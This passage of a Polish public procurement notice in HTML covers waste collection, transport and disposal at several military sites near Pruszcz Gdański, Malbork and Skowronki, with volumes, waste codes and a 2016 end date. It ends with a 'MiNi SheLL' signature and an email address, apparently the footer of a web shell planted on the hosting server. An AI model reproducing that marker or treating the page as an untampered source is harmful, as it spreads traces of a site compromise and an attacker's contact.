<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa odbioru, załadunku, transportu
oraz unieszkodliwiania niesegregowanych i segregowanych odpadów komunalnych
z terenu Jednostki Wojkowej 1300 w Pruszczu Gdańskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Odbiór,  załadunek,  transport  i  unieszkodliwianie  niesegregowanych  odpadów  komunalnych  
w Jednostce Wojskowej 1300 w Pruszczu Gdańskim w szacowanej  ilości 907,60 m3 na rok..  
2.  Odbiór,  załadunek,  transport  i  unieszkodliwianie  segregowanych  odpadów  komunalnych  
w Jednostce Wojskowej 1128 w Malborku wskazanej poniżej planowanej ilości na rok: 
1.1.	  20 01 01 - 29,28 m3,
1.2.	  20 01 02 -   8,04 m3,
1.3.	  20 01 39 - 35,16 m3,
1.4.	  20 03 07 -   7,00 m3.
3.  Szczegółowy wykaz obiektów na terenie, których prowadzona będzie usługa: 
a)  Lotnisko Pruszcz Gdański, 
b)  Radiostacja Grabiny Zameczek,

Szczegółowy  zakres  prac  do  wykonania  został  określony  w  załączonych  do  specyfikacji  istotnych warunków zamówienia dokumentach a w szczególności w:  
a)  Opis przedmiotu zamówienia 
b)  Projekcie umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa odbioru, załadunku, transportu
oraz unieszkodliwiania niesegregowanych odpadów komunalnych
w Obiekcie wojskowym w Skowronkach gmina Sztutowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Odbiór,  załadunek,  transport  i  unieszkodliwianie  niesegregowanych  odpadów  komunalnych  
w Obiekcie wojskowym w Skowronkach gmina Sztutowo w szacowanej  ilości 26,40 m3 na 
rok. 
2.  Odbiór, załadunek, transport i unieszkodliwianie segregowanych odpadów komunalnych w Jednostce Wojskowej 1128 w Malborku wskazanej poniżej planowanej ilości na rok:

1.1.	  20 01 01 -   0,60 m3,
1.2.	  20 01 02 -   0,60 m3,
1.3.	  20 01 39 -   0,60 m3,

Szczegółowy wykaz obiektów na terenie, których prowadzona będzie usługa: 
Punkt Obserwacyjny Skowronki.

Szczegółowy  zakres  prac  do  wykonania  został  określony  w  załączonych  do  specyfikacji  istotnych warunków zamówienia dokumentach a w szczególności w:  
a)  Opis przedmiotu zamówienia 
b)  Projekcie umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com